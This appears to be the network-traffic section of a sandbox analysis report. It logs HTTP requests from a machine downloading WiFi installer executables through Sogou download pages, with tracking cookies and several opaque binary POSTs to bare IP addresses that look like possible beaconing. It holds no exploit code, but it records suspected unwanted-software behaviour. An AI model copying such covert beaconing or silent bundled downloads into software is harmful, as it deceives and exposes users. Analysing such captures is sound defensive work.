HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=3869205-4570045
Referer: hXXp://112.5.251.213/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=11326565-11578455
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:38 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
HEAD /cooperation/popuprecommend/cooperation/install_finish.html HTTP/1.1
User-Agent: HttpRequest
Host: yze.t.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 200 OK
Date: Thu, 19 May 2016 04:36:34 GMT
Content-Type: text/html
ETag: "1298424334"
Accept-Ranges: bytes
Last-Modified: Tue, 25 Aug 2015 02:59:17 GMT
Content-Length: 1403
Server: WS CDN Server
Age: 9394
Via: 1.0 db80:8500 (Cdn Cache Server V2.0)
Connection: close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8649874-8660250
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:44 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8660251-8701287
Referer: hXXp://112.5.251.214/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /128128.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1564
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db80:7002 (Cdn Cache Server V2.0)
Connection: close
POST / HTTP/1.1
Host: 58.254.134.209:80
Content-type: application/octet-stream
Content-Length: 44
Connection: Keep-Alive
A... ... ...A:.=.._}.gS ..4<.g..\.9#}..4U...
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8619214-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:43 GMT
Content-Type: application/octet-stream
Content-Length: 3090314
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8619214-11709527/11709528
HEAD /pc_logo/7638937123950702413.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:08 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:08 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=5971728-11578455
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 5606728
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 5971728-11578455/11709528
POST / HTTP/1.1
Host: 122.143.5.59:80
Content-type: application/octet-stream
Content-Length: 92
Connection: Keep-Alive
@.......P...........V.......mK9[4[....*J..hrQ.'.4..]$ .a8..h(.&..........t.1..b...m..%..S...
HTTP/1.1 200 OK
Content-Length: 8604
Content-Type: application/octet-stream
Connection: Close
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11326565-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: application/octet-stream
Content-Length: 382963
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11326565-11709527/11709528
HEAD /pc_logo/7638937123950702413.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:50 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:50 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
POST / HTTP/1.1
Host: 58.254.134.238:80
Content-type: application/octet-stream
Content-Length: 108
Connection: Keep-Alive
A.......`...g...@w/............W...%8-.$.RRt%...^K..*.{~)...p...n..c....6...5.:l...w.e..V...8.'.......R..@..
HTTP/1.1 200 OK
Content-Length: 28
Content-Type: application/octet-stream
Connection: Close
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5733707-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:38 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11386975-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:46 GMT
Content-Type: application/octet-stream
Content-Length: 322553
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11386975-11709527/11709528
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=1701146-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: application/octet-stream
Content-Length: 10008382
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 1701146-11709527/11709528
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8508097-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: application/octet-stream
Content-Length: 3201431
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8508097-11709527/11709528
GET /app/a/10190001/381427456234840 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img01.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: NWS_VCLOUD_ACCESS
Connection: keep-alive
Date: Thu, 19 May 2016 07:13:11 GMT
Cache-Control: max-age=86400
Expires: Fri, 20 May 2016 07:13:11 GMT
Last-Modified: Thu, 19 May 2016 00:17:10 GMT
Content-Type: image/jpeg
Content-Length: 113605
X-Cache-Lookup: Hit From MemCache
ETag: b9ab65e9c989f8d59fab66485d4cc5ca
X-Daa-Tunnel: hop_count=1
X-Cache-Lookup: Hit From Inner Cluster
HEAD /pc_logo/7638937123950702413.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
GET /pc_logo/7638937123950702413.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.app.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1604
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db79:82 (Cdn Cache Server V2.0)
Connection: close
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=10090249-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: application/octet-stream
Content-Length: 1619279
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 10090249-11709527/11709528
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:21 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5971727
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=3869205-4570045
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->....
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=9556963-10176773
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:34 GMT
Content-Type: application/octet-stream
Content-Length: 619811
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 9556963-10176773/11709528
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8782146-11709527
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:20 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->....
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=8775092-11578455
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 2803364
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 8775092-11578455/11709528
<<< skipped >>>
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=3168364-5971727
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 2803364
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 3168364-5971727/11709528
<<< skipped >>>
GET /app/a/10190001/741430117543639 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img04.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: NWS_VCLOUD_ACCESS
Connection: keep-alive
Date: Thu, 19 May 2016 07:13:12 GMT
Cache-Control: max-age=86400
Expires: Fri, 20 May 2016 07:13:12 GMT
Last-Modified: Wed, 18 May 2016 23:18:10 GMT
Content-Type: image/png
Content-Length: 151522
X-Cache-Lookup: Hit From Disktank
ETag: 39932f127e952c35a683cdf6fe90d0a7
X-Daa-Tunnel: hop_count=1
X-Cache-Lookup: Hit From Inner Cluster
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8660251-8742323
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:40 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->....
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=1065841-1766681
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:29 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5270887-5971727
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:32 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->....
GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=7373410-8775091
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: application/octet-stream
Content-Length: 1401682
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 7373410-8775091/11709528
<<< skipped >>>
GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=2927382-5854763
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:12:56 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title></head>..<body bgcolor="white">..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->..<!-- The padding to disable MSIE's friendly error page -->....
GET /net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/zhuanti_58_640x260.jpg&r= HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:13 GMT
Content-Type: image/jpeg
Content-Length: 22849
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 10:35:50 GMT
Expires: Thu, 19 May 2016 10:35:50 GMT
Cache-Control: max-age=86400
ETag: ba3617d88686c674c13033d96307ba4d
